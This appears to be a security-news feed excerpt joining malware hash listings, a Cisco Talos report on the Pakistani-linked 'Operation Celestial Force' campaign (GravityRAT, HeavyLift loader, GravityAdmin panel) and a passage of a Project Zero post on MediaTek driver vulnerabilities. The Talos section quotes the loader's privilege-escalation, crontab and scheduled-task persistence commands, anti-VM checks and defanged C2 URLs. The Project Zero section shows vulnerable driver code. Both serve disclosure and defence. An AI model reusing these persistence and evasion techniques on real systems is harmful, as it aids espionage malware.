Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe 
Claimed Product: FileZilla 
Detection Name: W32.Application.27hg.1201 

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0 
MD5: b4440eea7367c3fb04a89225df4022a6 
Typical Filename: Pdfixers.exe 
Claimed Product: Pdfixers 
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

Operation Celestial Force employs mobile and desktop malware to target Indian entities

13 June 2024 at 10:00
Operation Celestial Force employs mobile and desktop malware to target Indian entities

By Gi7w0rm, Asheer Malhotra and Vitor Ventura. 

  • Cisco Talos is disclosing a new malware campaign called “Operation Celestial Force” running since at least 2018. It is still active today, employing the use of GravityRAT, an Android-based malware, along with a Windows-based malware loader we track as “HeavyLift.”  
  • All GravityRAT and HeavyLift infections are administered by a standalone tool we are calling “GravityAdmin,” which carries out malicious activities on an infected device. Analysis of the panel binaries reveals that they are meant to administer and run multiple campaigns at the same time, all of which are codenamed and have their own admin panels.  
  • Talos attributes this operation with high confidence to a Pakistani nexus of threat actors we’re calling “Cosmic Leopard,” focused on espionage and surveillance of their targets.  This multiyear operation continuously targeted Indian entities and individuals likely belonging to defense, government and related technology spaces. Talos initially disclosed the use of the Windows-based GravityRAT malware by suspected Pakistani threat actors in 2018 — also used to target Indian entities.  
  • While this operation has been active for at least the past six years, Talos has observed a general uptick in the threat landscape in recent years, with respect to the use of mobile malware for espionage to target high-value targets, including the use of commercial spyware

Operation Celestial Force: A multi-campaign, multi-component infections operation 

Talos assesses with high confidence that this series of campaigns we’re clustering under the umbrella of “Operation Celestial Force” is conducted by a nexus of Pakistani threat actors. The tactics, techniques, tooling and victimology of Cosmic Leopard contain some overlaps with those of Transparent Tribe, another suspected Pakistani APT group, which has a history of targeting high-value individuals from the Indian subcontinent. However, we do not have enough technical evidence to link both the threat actors together for now, therefore we track this cluster of activity under the “Cosmic Leopard” tag. 

Operation Celestial Force has been active since at least 2018 and continues to operate today — increasingly utilizing an expanding and evolving malware suite — indicating that the operation has likely seen a high degree of success targeting users in the Indian subcontinent. Cosmic Leopard initially began the operation with the creation and deployment of the Windows based GravityRAT malware family distributed via malicious documents (maldocs). Cosmic Leopard then created Android-based versions of GravityRAT to widen their net of infections to begin targeting mobile devices around 2019. During the same year, Cosmic Leopard also expanded their arsenal to use the HeavyLift malware family as a malware loader. HeavyLift is primarily wrapped in malicious installers sent to targets tricked into running the into running the malware via social engineering techniques. 

Some campaigns from this multi-year operation have been disclosed and loosely attributed to Pakistani threat actors in previous reporting. However, there has been little evidence to tie all of them together until now. Each campaign in the operation has been codenamed by the threat actor and managed/administered using custom-built panel binaries we call “GravityAdmin.” 

Adversaries like Cosmic Leopard may use low-sophistication techniques such as social engineering and spear phishing, but will aggressively target potential victims with various TTPs. Therefore, organizations must remain vigilant against such motivated adversaries conducting targeted attacks by educating users on proper cyber hygiene and implementing defense-in-depth models to protect against such attacks across various attack surfaces.

Initiating contact and infecting targets 

This campaign primarily utilizes two infection vectors — spear phishing and social engineering. Spear phishing consists of messages sent to targets with pertinent language and maldocs that contain malware such as GravityRAT. 

The other infection vector, gaining popularity in this operation, and now a staple tactic of the Cosmic Leopard’s operations consists of contacting targets over social media channels, establishing trust with them and eventually sending them a malicious link to download either the Windows- or Android-based GravityRAT or the Windows-based loader, HeavyLift. 

Operation Celestial Force employs mobile and desktop malware to target Indian entities
 Malicious drop site delivering HeavyLift. 

Operation Celestial Force’s malware and its management interfaces 

Talos’ analysis reveals the use of multiple components, including Android- and Windows-based malware, and administrative binaries supporting multiple campaign panels used by Operation Celestial Force. 

  • GravityRAT: GravityRAT, a closed-source malware family, first disclosed by Talos in 2018, is a Windows- and Android-based RAT used to target Indian entities.  
  • HeavyLift: A previously unknown Electron-based malware loader family distributed via malicious installers targeting the Windows operating system.  
  • GravityAdmin: A tool to administer infected systems (panel binary), used by operators since at least 2021, by connecting to GravityRAT’s and HeavyLift’s C2 servers. GravityAdmin consists of multiple inbuilt User Interfaces (UIs) that correspond to specific, codenamed, campaigns being operated by malicious operators.   

Operation Celestial Force’s infection chains are:  

Operation Celestial Force employs mobile and desktop malware to target Indian entities

GravityAdmin: Panel binaries administering the campaigns 

The Panel binaries we analyzed consist of multiple versions with the earliest compiled in August 2021. The panel binary asks for a user ID, password and campaign ID (from a drop-down menu) from the operator when it runs.  

Operation Celestial Force employs mobile and desktop malware to target Indian entities
 Login screen for GravityAdmin titled “Bits Before Bullets.”

When the operator clicks the login button, the executable will check if it is connected to the internet by sending a ping request to www[.]google[.]com. Then, the user ID and password are authenticated with an authentication server which sends back: 

  • A code to direct the panel binary to open the panel UI for the specified panel. 
  • Also sends a value back via the HTTP “Authorization” Header. This value acts as an authentication token when communicating with campaign-specific[ C2 servers to load data such as a list of infected machines, etc. 

A typical Panel screen will list the machines infected as part of the specific campaign. It also has buttons to trigger various malicious actions against one or more infected systems.  

Operation Celestial Force employs mobile and desktop malware to target Indian entities

Different panels have different capabilities, however, some core capabilities are common across all campaigns. 

The various campaigns configured in the Panel binaries are code named as: 

  • "SIERRA" 
  • "QUEBEC" 
  • "ZULU" 
  • "DROPPER" 
  • "WORDDROPPER" 
  • "COMICUM" 
  • "ROCKAMORE" 
  • "FOXTROT" 
  • "CLOUDINFINITY" 
  • "RECOVERBIN" 
  • "CVSCOUT" 
  • "WEBBUCKET" 
  • "CRAFTWITHME" 
  • "SEXYBER" 
  • "CHATICO" 

Each of the codenamed campaigns from the Panel binaries consists of its own infection mechanisms. For example, “FOXTROT,” “CLOUDINFINITY” and “CHATICO” are names given to all Android-based GravityRAT infections whereas “CRAFTWITHME,” “SEXYBER” and “CVSCOUT” are named for attacks deploying HeavyLift. Our analysis correlates the campaigns listed above with the Operating Systems being targeted with respective malware families. 

Campaign Name 

Platform targeted and Malware Used 

SIERRA 

Windows, GravityRAT 

QUEBEC 

Windows, GravityRAT 

ZULU 

Windows, GravityRAT 

DROPPER / WORDDROPPER / COMICUM  

Windows, GravityRAT 

ROCKAMORE 

Windows, GravityRAT 

FOXTROT / CLOUDINFINITY / RECOVERBIN / CHATICO    

Android, GravityRAT 

CVSCOUT 

Windows, HeavyLift 

WEBBUCKET / CRAFTWITHME 

Windows, HeavyLift 

SEXYBER 

Windows, HeavyLift 

Most campaigns consist of infrastructure overlaps between each other mostly to host malicious payloads or maintain a list of infected systems. 

Malicious domain 

Campaigns using the domain 

mozillasecurity[.]com 

SIERRA  

QUEBEC 

DROPPER 

officelibraries[.]com 

SIERRA 

DROPPER 

ZULU 

GravityRAT: A multi-platform remote access trojan

GravityRAT is a Windows-based remote access trojan first disclosed by Talos in 2018. GravityRAT was later ported to the Android operating system to target mobile devices around 2019. Since 2019, we’ve observed a continuous addition of a multitude of capabilities in GravityRAT and its associated infrastructure. So far, we have observed the use of GravityRAT exclusively by suspected Pakistani threat actors to target entities and individuals in India. There is currently no publicly available evidence to suggest that GravityRAT is a commodity/open-source malware, suggesting its potential use by multiple, disparate threat actors. 

Our analysis of the entire ecosystem of Operation Celestial Force revealed that GravityRAT’s use in this campaign likely began as early as 2016 and continues to this day. 

The latest variants of GravityRAT are distributed through malicious websites, some registered and set up as late as early January 2024, pretending to distribute legitimate Android applications. Malicious operators will distribute the download links to their targets over social media channels asking them to download and install the malware. 

The latest variants of GravityRAT use the previously mentioned code names to define the campaigns. The screenshot below shows the initial registration of a victim into the C2, getting back a list of alternative C2 to be used, if needed.  

Operation Celestial Force employs mobile and desktop malware to target Indian entities
 The group uses Cloudflare service to hide the true location of their C2 servers.

After registration, the trojan requests tasks to execute to the C2 followed by uploading a file containing the device's location.  

The trojan will use a different user-agent for each request — it's unclear if this is done on purpose, or if this anomaly is just the result of cut-and-paste code from other projects to tie together this trojan’s features.  

GravityRAT requests the following permissions on the device for stealing information and housekeeping tasks. 

Operation Celestial Force employs mobile and desktop malware to target Indian entities

These variants of GravityRAT are similar to previously disclosed versions from ESET and Cyble and consist of the following capabilities: 

  1. Send preliminary information about the device to the C2. This information includes IMEI, phone number, network country ISO code, network operator name, SIM country ISO code, SIM operator name, SIM serial number, device model, brand, product and manufacturer, addresses surrounding the obtained longitude and latitude of the device and the current build information, including release, host, etc. 
  2. Read SMS data and content and upload to the C2. 
  3. Read specific file formats and upload them to the C2. 
  4. Read call logs and upload them to the C2. 
  5. Obtain IMEI information including associated email ID and send it to C2. 
  6. Delete all contacts, call logs and files related to the malware. 

HeavyLift: Electron-based malware loader

Some of the campaigns in this operation use Electron-based malware loaders we’re calling “HeavyLift,” which consist of JavaScript code communicating and controlled by C2 servers. These are the same C2 servers that interact with GravityAdmin, the panel tool used by the operators to govern infected systems. HeavyLift is essentially a stage one malware component that downloads and installs other malicious implants whenever available on the C2 server. HeavyLift bears some similarities with GravityRAT’s Electron versions disclosed previously by Kaspersky in 2020. 

A HeavyLift infection begins with an executable masquerading as an installer for a legitimate application. The installer installs a dummy application but also installs and sets up a malicious Electron-based desktop application. This malicious application is, in fact, HeavyLift and consists of JavaScript code that carries out malicious operations on the infected system. 

On execution, HeavyLift will check if it is running on a macOS or Windows system. If it is running on macOS, and not running as root, it will execute with admin privileges using the command: 

 /usr/bin/osascript -e 'do shell script "bash -c " _process_path " with administrator privileges'  

If it is running as root, it will set the default HTTP User-Agent to “M_9C9353252222ABD88B123CE5A78B70F6”, then get system info using the commands: 

system_profiler SPHardwareDataType | grep 'Model Name' 

system_profiler SPHardwareDataType | grep 'SMC' 

system_profiler SPHardwareDataType | grep 'Model Identifier' 

system_profiler SPHardwareDataType | grep 'ROM' 

system_profiler SPHardwareDataType | grep 'Serial Number'  

For a Windows-based system, the HTTP User-Agent is set to “W_9C9353252222ABD88B123CE5A78B70F6”. The malware will then obtain preliminary system information such as: 

  • Processor ID 
  • MAC address 
  • Installed anti-virus product name 
  • Username 
  • Domain name 
  • Platform information 
  • Process, OS architecture 
  • Agent (hardcoded value) 
  • OS release number 

All this preliminary information is sent to the hardcoded C2 server URL to register the infection with the C2. 

HeavyLift will then reach out to the C2 server to poll for any new payloads to execute on the infected system. A payload received from the C2 will be dropped to a directory in the “AppData” directory and persisted on the system. 

On macOS, the payload is a ZIP file that is extracted, and the resulting binary persists using crontab via the command: 

crontab -l 2>/dev/null; echo ' */2 * * * * “_filepath_” _arguments_ ‘ | crontab - 

For Windows, the payload received is an EXE file that persists on the system via a scheduled task. The malware will create an XML file for the scheduled tasks with the payload path, arguments and working directory and then use the XML to set up the schedtask: 

SCHTASKS /Create /XML "_xmlpath_" /TN "_taskname_" /F 

The malware will then open the accompanying HTML file via web view to appear legitimate. 

 In some cases, the malware will also perform anti-analysis checks to see if it’s running in a virtual environment.  

It checks for the presence of specific keywords before closing if there is a match: 

  • Innotek GmbH 
  • VirtualBox 
  • VMware 
  • Microsoft Corporation 
  • HITACHI

These keywords are checked against model information, SMC, ROM and serial numbers on macOS and Windows against manufacturer information, such as product, vendor, processor and more. 

Coverage 

Ways our customers can detect and block this threat are listed below.  

Operation Celestial Force employs mobile and desktop malware to target Indian entities

 Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

 Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

 Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

 Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

 

 

IOCs 

IOCs for this research can also be found at our GitHub repository here

HeavyLift 

8e9bcc00fc32ddc612bdc0f1465fc79b40fc9e2df1003d452885e7e10feab1ee
ceb7b757b89693373ffa1c46dd96544bdc25d1a47608c2ea24578294bcf1db37 
06b617aa8c38f916de8553ff6f572dcaa96e5c8941063c55b6c424289038c3a1 
da3907cf75662c3401581a5140831f8b2520a4c3645257b3860c7db94295af88 
838fd5d269fa09ef4f7e9f586b6577a9f46123a0af551de02de78501d916236d 
12d98137cd1b0cf59ce2fafbfe3a9c3477a42dae840909adad5d4d9f05dd8ede 
688c8e4522061bb9d82e4c3584f7ef8afc6f9e07e2374567755faad2a22e25b8 
5695c1e5e4b381844a36d8281126eef73a9641a315f3fdd2eb475c9073c5f4da 
8d458fb59b6da20e1ba1658bb4a1f7dbb46d894530878e91b64d3c675d3d4516

 

GravityRAT Android 

36851d1da9b2f35da92d70d4c88ea1675f1059d68fafd3abb1099e075512b45e 
4ebdfa738ef74945f6165e337050889dfa0aad61115b738672bbeda648a59dab 
1382997d3a5bb9bdbb9d41bb84c916784591c7cdae68305c3177f327d8a63b71 
c00cedd6579e01187cd256736b8a506c168c6770776475e8327631df2181fae2 
380df073825aca1e2fdbea379431c2f4571a8c7d9369e207a31d2479fbc7be88

  

GravityAdmin 

63a76ca25a5e1e1cf6f0ca8d32ce14980736195e4e2990682b3294b125d241cf 
69414a0ca1de6b2ab7b504a507d35c859fc5a1b8e0b3cf0c6a8948b2f652cbe9 
04e216f4780b6292ccc836fa0481607c62abb244f6a2eedc21c4a822bcf6d79f

 

Network IOCs 

 androidmetricsasia[.]com 
dl01[.]mozillasecurity[.]com 
officelibraries[.]com 
javacdnlib[.]com 
windowsupdatecloud[.]com 
webbucket[.]co[.]uk 
craftwithme[.]uk 
sexyber[.]net 
rockamore[.]co[.]uk 
androidsdkstream[.]com 
playstoreapi[.]net 
sdklibraries[.]com 
cvscout[.]uk 
zclouddrive[.]com 
jdklibraries[.]com 
cloudieapp[.]net 
androidadbserver[.]com 
androidwebkit[.]com 
teraspace[.]co[.]in

  

hxxps[://]zclouddrive[.]com/downloads/CloudDrive_Setup_1[.]0[.]1[.]exe 
hxxps[://]www[.]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]cloudieapp[.]net/cloudie[.]zip 
hxxps[://]sni1[.]androidmetricsasia[.]com/voilet/8a99d28c[.]php 
hxxps[://]dev[.]androidadbserver[.]com/jurassic/6c67d428[.]php 
hxxps[://]adb[.]androidadbserver[.]com/jurassic/6c67d428[.]php 
hxxps[://]library[.]androidwebkit[.]com/kangaroo/8a99d28c[.]php 
hxxps[://]ux[.]androidwebkit[.]com/kangaroo/8a99d28c[.]php 
hxxps[://]jupiter[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]moon[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]sni1[.]androidmetricsasia[.]com/voilet/8a99d28c[.]php 
hxxps[://]moon[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]moon[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]jre[.]jdklibraries[.]com/hotriculture/671e00eb[.]php  
hxxps[://]jre[.]jdklibraries[.]com/hotriculture/671e00eb[.]php  
hxxps[://]cloudinfinity-d4049-default-rtdb[.]firebaseio[.]com/ 
hxxps[://]dl01[.]mozillasecurity[.]com/ 
hxxps[://]dl01[.]mozillasecurity[.]com/Sier/resauth[.]php 
hxxps[://]dl01[.]mozillasecurity[.]com/resauth[.]php/ 
hxxps[://]tl37[.]officelibraries[.]com/Sier/resauth[.]php 
hxxps[://]tl37[.]officelibraries[.]com/resauth[.]php/ 
hxxps[://]jun[.]javacdnlib[.]com/Quebec/5be977ac[.]php 
hxxps[://]dl01[.]mozillasecurity[.]com/resauth[.]php/ 
hxxps[://]dl01[.]mozillasecurity[.]com/MicrosoftUpdates/6efbb147[.]php 
hxxps[://]tl37[.]officelibraries[.]com/MicrosoftUpdates/741bbfe6[.]php 
hxxps[://]tl37[.]officelibraries[.]com/MsWordUpdates/c47d1870[.]php 
hxxps[://]dl01[.]windowsupdatecloud[.]com/opex/7ab24931[.]php 
hxxps[://]tl37[.]officelibraries[.]com/opex/13942BA7[.]php 
hxxp[://]dl01[.]windowsupdatecloud[.]com/opex/7ab24931[.]php 
hxxps[://]tl37[.]officelibraries[.]com/opex/13942BA7[.]php 
hxxps[://]download[.]rockamore[.]co[.]uk/m2c/m_client[.]php 
hxxps[://]api1[.]androidsdkstream[.]com/foxtrot/ 
hxxps[://]api1[.]androidsdkstream[.]com/foxtrot/61c10953[.]php 
hxxps[://]jupiter[.]playstoreapi[.]net/RB/e7a18a38[.]php 
hxxps[://]sdk2[.]sdklibraries[.]com/golf/c6cf642b[.]php 
hxxps[://]jre[.]jdklibraries[.]com/hotriculture/671e00eb[.]php 
hxxps://hxxp[://]api1[.]androidsdkstream[.]com/foxtrot//DataX/ 
hxxps[://]download[.]cvscout[.]uk/cvscout/cvstyler_client[.]php 
hxxps[://]download[.]webbucket[.]co[.]uk/webbucket/strong_client[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/craftwithme/strong_client[.]php 
hxxps[://]download[.]sexyber[.]net/sexyber/sexyberC[.]php 
hxxps[://]download[.]webbucket[.]co[.]uk/A0B74607[.]php 
hxxps[://]zclouddrive[.]com/system/546F9A[.]php 
hxxps[://]download[.]cvscout[.]uk/cvscout/ 
hxxps[://]download[.]cvscout[.]uk/c9a5e83c[.]php 
hxxps[://]zclouddrive[.]com/downloads/CloudDrive_Setup_1[.]0[.]1[.]exe 
hxxps[://]zclouddrive[.]com/system/clouddrive/ 
hxxps[://]www[.]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]download[.]sexyber[.]net/0fb1e3a0[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/d26873c6[.]php 
hxxps[://]download[.]teraspace[.]co[.]in/teraspace/ 
hxxps[://]download[.]teraspace[.]co[.]in/78181D14[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/craftwithme/ 
hxxps[://]download[.]webbucket[.]co[.]uk/webbucket/

Driving forward in Android drivers

13 June 2024 at 18:03

Posted by Seth Jenkins, Google Project Zero

Introduction

Android's open-source ecosystem has led to an incredible diversity of manufacturers and vendors developing software that runs on a broad variety of hardware. This hardware requires supporting drivers, meaning that many different codebases carry the potential to compromise a significant segment of Android phones. There are recent public examples of third-party drivers containing serious vulnerabilities that are exploited on Android. While there exists a well-established body of public (and In-the-Wild) security research on Android GPU drivers, other chipset components may not be as frequently audited so this research sought to explore those drivers in greater detail.

Driver Enumeration: Not as Easy as it Looks

This research focused on three Android devices (chipset manufacturers in parentheses):

- Google Pixel 7 (Tensor)

- Xiaomi 11T (MediaTek)

- Asus ROG 6D (MediaTek)

In order to perform driver research on these devices I first had to find all of the kernel drivers that were accessible from an unprivileged context on each device; a task complicated by the non-uniformity of kernel drivers (and their permissions structures) across different devices even within the same chipset manufacturer. There are several different methodologies for discovering these drivers. The most straightforward technique is to search the associated filesystems looking for exposed driver device files. These files serve as the primary method by which userland can interact with the driver. Normally the “file” is open’d by a userland process, which then uses a combination of read, write, ioctl, or even mmap to interact with the driver. The driver then “translates” those interactions into manipulations of the underlying hardware device sending the output of that device back to userland as warranted. Effectively all drivers expose their interfaces through the ProcFS or DevFS filesystems, so I focused on the /proc and /dev directories while searching for viable attack surfaces. Theoretically, evaluating all the userland accessible drivers should be as simple as calling find /dev or find /proc, attempting to open every file discovered, and logging which open attempts were successful.

However, there is one major roadblock that prevents this approach from being comprehensive - permissions! SELinux and traditional Linux Discretionary Access Control policies can prevent simple filesystem enumeration from discovering all of the accessible device drivers associated on the filesystem. For example, the untrusted_app SELinux context has search permissions on the device SELinux context for directories, but is not allowed to directly open the directory itself:

sepolicy shows search permission on the "device" SELinux context

This search permission (rather counterintuitively) does not allow the source context to list the contents of directories that have this SELinux target context. Instead, it simply allows such a directory to be in the ancestor directories of the file path that the source context attempts to open. In practice, this means that untrusted_app is allowed to open e.g. /dev/mali0 but is usually not allowed to open /dev itself:

untrusted_app is unable to list /dev but can open files within it like /dev/mali0

In the case of /dev, the shell context is allowed to open and list the contents of /dev. That means that by first enumerating the /dev directory from the shell context, then attempting to open all discovered files from the untrusted_app context, a security researcher can understand what drivers are and are not accessible from an app context in the /dev directory. However, there are cases where certain directories are simply not listable from a debugging-accessible non-root context, particularly in /proc. One option to enumerate all these directories would be to root the phone, however, this is not always easily achievable.

A strategy I found helpful in this regard was to examine publicly released kernel source code for the phone model or for similar phone models. The location of this source code varies significantly from manufacturer to manufacturer, but the source code is usually either hosted on Github or via the manufacturer website. Device drivers create files in /proc primarily via the proc_create() and proc_mkdir() function calls. A real-world example of this would be:

        parent = proc_mkdir("perfmgr", NULL);

        perfmgr_root = parent;

        pe = proc_create("perf_ioctl", 0664, parent, &Fops);

        ...

        pe = proc_create("eara_ioctl", 0664, parent, &eara_Fops);

        ...

        pe = proc_create("eas_ioctl", 0664, parent, &eas_Fops);

        ...

        pe = proc_create("xgff_ioctl", 0664, parent, &xgff_Fops);

        ...

Although these files cannot be directly enumerated, they do exist and are accessible from an untrusted context.

/proc/perfmgr directory contents cannot be listed with ls, but can be open'd

It would have otherwise required rooting the phone to discover this driver without analyzing the kernel source code.

Another useful resource is the SELinux policy itself. Userland interacts with the drivers via a fairly typical set of VFS operations. This means that the SELinux policy must encapsulate the necessary permissions to perform those operations. This means that the SELinux policy generally reflects what the developers intend to be accessible from an untrusted context. Analysis of the policy can lead to the discovery of certain oddities and idiosyncrasies in the accessibility of certain drivers. For example, occasionally a file may not be directly openable via the filesystem, but there may be some alternative method by which an app can ask another more privileged process to open the file on its behalf and hand the associated fd back, after which the app is allowed to read/write/ioctl to the fd itself. One example of this behavior would be the EdgeTPU device on the Pixel 7:

Additional research suggests that untrusted_app can ask a privileged process for access to the EdgeTPU driver fd itself if it lands on an allowlist of certain applications.

The performed surveys strongly imply that the GPU driver is the most consistently accessible driver from an untrusted application, which is expected. On the Google Pixel 7, I did not find much else that was accessible from an entirely unprivileged context. Nevertheless, inspired by previous similar efforts on hardware like Samsung’s NPU, I performed research on the EdgeTPU driver - Google’s tensor processing unit for doing ML related tasks on the Pixel series of devices. This resulted in the discovery of one significant issue - a race condition when registering memory with the EdgeTPU memory while vma’s are concurrently getting modified.

Unlike the Pixel 7, the MediaTek chipset phones (Asus ROG 6D and Xiaomi 11T) contained several different drivers that could be accessed from unprivileged userland:

  • /proc/ged
  • /proc/mtk_jpeg
  • /proc/perfmgr/[eara_ioctl,eas_ioctl,perf_ioctl,xgff_ioctl]

These drivers represent significantly more interesting and complex attack surfaces than what was available on the Pixel 7 device. The ged driver contained numerous interesting and valuable exploitation primitives that we’ll discuss in detail a bit later. While the perfmgr driver presented several attack surfaces, I wasn’t able to find any security-relevant bugs. The mtk_jpeg driver however, yielded significant fruit that deserves a closer look.

MediaTek JPEG Decoding Accelerator

The mtk_jpeg driver manages specialized hardware on MediaTek devices to perform jpeg decoding acceleration. Linux kernel documentation notes that “Mediatek JPEG Decoder is the JPEG decode hardware present in Mediatek SoCs”. More relevantly, from an attacker's point of view, this driver can be accessed (at least on the phones assessed) from the untrusted_app context (although curiously, it cannot be accessed from an unprivileged adb debugging context). This JPEG decoding accelerator and its associated driver is present on both the Xiaomi 11T and the Asus ROG 6D. However, based on open-source codebases for these different devices' kernels, it appears MediaTek is actively maintaining several different trees for this driver, likely based on the associated kernel version, and these two devices use separate trees.

I found two vulnerabilities in this driver. CVE-2023-32837 was a textbook OOB read/write in an array of structs. Various different members of the struct were accessed and modified, creating several different possibilities for exploitation, but also making them significantly more challenging. Interestingly, MediaTek partially fixed this bug in July 2021, although the exact date this patch went out to OEMs is unclear. From the commit message, it’s clear that MediaTek detected this issue with the Coverity static analysis tool, but it appears unlikely that the security impact was identified. Regardless, while the issue was fixed in some of the MediaTek kernel trees, it went unpatched in other versions of that same driver. This meant that while the Asus ROG 6D (running kernel 5.10) had received the patch for this vulnerability, the (otherwise fully patched and security supported) Xiaomi 11T (running 4.14) had not.

Some background knowledge on how the jpeg driver works eases discussion of the other issue, CVE-2023-32832. The accelerator hardware has two separate “cores” that can perform JPEG decoding. When a process requests JPEG decoding work to be performed, it calls the ioctl JPEG_DEC_IOCTL_HYBRID_START, and the kernel decides which decoding core will perform that work inside of jpeg_drv_hybrid_dec_lock()(output has been colorized to ease following along):

static int jpeg_drv_hybrid_dec_lock(int *hwid)

{

        int retValue = 0;

        int id = 0;

        ...

        mutex_lock(&jpeg_hybrid_dec_lock);

        for (id = 0; id < HW_CORE_NUMBER; id++) {

                if (dec_hwlocked[id]) {

                        JPEG_LOG(1, "jpeg dec HW core %d is busy", id);

                        continue;

                } else {

                        *hwid = id;

                        dec_hwlocked[id] = true;

                        JPEG_LOG(1, "jpeg dec get %d HW core", id);

                        _jpeg_hybrid_dec_int_status[id] = 0;

                        jpeg_drv_hybrid_dec_power_on(id);

                        enable_irq(gJpegqDev.hybriddecIrqId[id]);

                        break;

                }

        }

        mutex_unlock(&jpeg_hybrid_dec_lock);

        if (id == HW_CORE_NUMBER) {

                JPEG_LOG(1, "jpeg dec HW core all busy");

                *hwid = -1;

                retValue = -EBUSY;

        }

        return retValue;

}

The array dec_hwlocked contains a boolean element for each core, with that element being set to true for locked cores, and false for unlocked cores. This array is also protected with a mutex to try and prevent concurrent calls to jpeg_drv_hybrid_dec_lock, or jpeg_drv_hybrid_dec_unlock from racing with each other. After locking the core, jpeg_drv_hybrid_dec_start sets up the data-structures to be utilized for the decoding operation:

switch (cmd) {

        case JPEG_DEC_IOCTL_HYBRID_START:

                if (copy_from_user(

                        &taskParams, (void *)arg,

                        sizeof(struct JPEG_DEC_DRV_HYBRID_TASK))) {

                        return -EFAULT;

                }

                ...

                if (jpeg_drv_hybrid_dec_lock(&hwid) == 0) {

                        *pStatus = JPEG_DEC_PROCESS;

                } else {

                        JPEG_LOG(1, "jpeg_drv_hybrid_dec_lock failed (hw busy)");

                        return -EBUSY;

                }

                if (jpeg_drv_hybrid_dec_start(taskParams.data, hwid, &index_buf_fd) == 0) {

                        ...

                } else {

                        JPEG_LOG(0, "jpeg_drv_dec_hybrid_start failed");

                        jpeg_drv_hybrid_dec_unlock(hwid);

                        return -EFAULT;

                }

                break;

...

}

static int jpeg_drv_hybrid_dec_start(unsigned int data[],unsigned int id,int *index_buf_fd)

{

        u64 ibuf_iova, obuf_iova;

        int ret;

        void *ptr;

        unsigned int node_id;

        JPEG_LOG(1, "+ id:%d", id);

        ret = 0;

        ibuf_iova = 0;

        obuf_iova = 0;

        node_id = id / 2;

        bufInfo[id].o_dbuf = jpg_dmabuf_alloc(data[20], 128, 0);

        bufInfo[id].o_attach = NULL;

        bufInfo[id].o_sgt = NULL;

        bufInfo[id].i_dbuf = jpg_dmabuf_get(data[7]);

        bufInfo[id].i_attach = NULL;

        bufInfo[id].i_sgt = NULL;

        if (!bufInfo[id].o_dbuf) {

            JPEG_LOG(0, "o_dbuf alloc failed");

                return -1;

        }

        if (!bufInfo[id].i_dbuf) {

            JPEG_LOG(0, "i_dbuf null error");

                return -1;

        }

        ret = jpg_dmabuf_get_iova(bufInfo[id].o_dbuf, &obuf_iova, gJpegqDev.pDev[node_id], &bufInfo[id].o_attach, &bufInfo[id].o_sgt);

        JPEG_LOG(1, "obuf_iova:0x%llx lsb:0x%lx msb:0x%lx", obuf_iova,

                (unsigned long)(unsigned char*)obuf_iova,

                (unsigned long)(unsigned char*)(obuf_iova>>32));

        ptr = jpg_dmabuf_vmap(bufInfo[id].o_dbuf);

        if (ptr != NULL && data[20] > 0)

                memset(ptr, 0, data[20]);

        jpg_dmabuf_vunmap(bufInfo[id].o_dbuf, ptr);

        jpg_get_dmabuf(bufInfo[id].o_dbuf);

        // get obuf for adding reference count, avoid early release in userspace.

        *index_buf_fd = jpg_dmabuf_fd(bufInfo[id].o_dbuf);

        ret = jpg_dmabuf_get_iova(bufInfo[id].i_dbuf, &ibuf_iova, gJpegqDev.pDev[node_id], &bufInfo[id].i_attach, &bufInfo[id].i_sgt);

        JPEG_LOG(1, "ibuf_iova 0x%llx lsb:0x%lx msb:0x%lx", ibuf_iova,

                (unsigned long)(unsigned char*)ibuf_iova,

                (unsigned long)(unsigned char*)(ibuf_iova>>32));

        if (ret != 0) {

                JPEG_LOG(0, "get iova fail i:0x%llx o:0x%llx", ibuf_iova, obuf_iova);

                return ret;

        }

        ...

        return ret;

}

Finally, utilizing an ioctl call to JPEG_DEC_IOCTL_HYBRID_WAIT (which calls jpeg_drv_hybrid_dec_unlock), resources associated with the core are freed, and the core is released back to be used in future operations.

case JPEG_DEC_IOCTL_HYBRID_WAIT:

                ...

                if (copy_from_user(

                        &pnsParmas, (void *)arg,

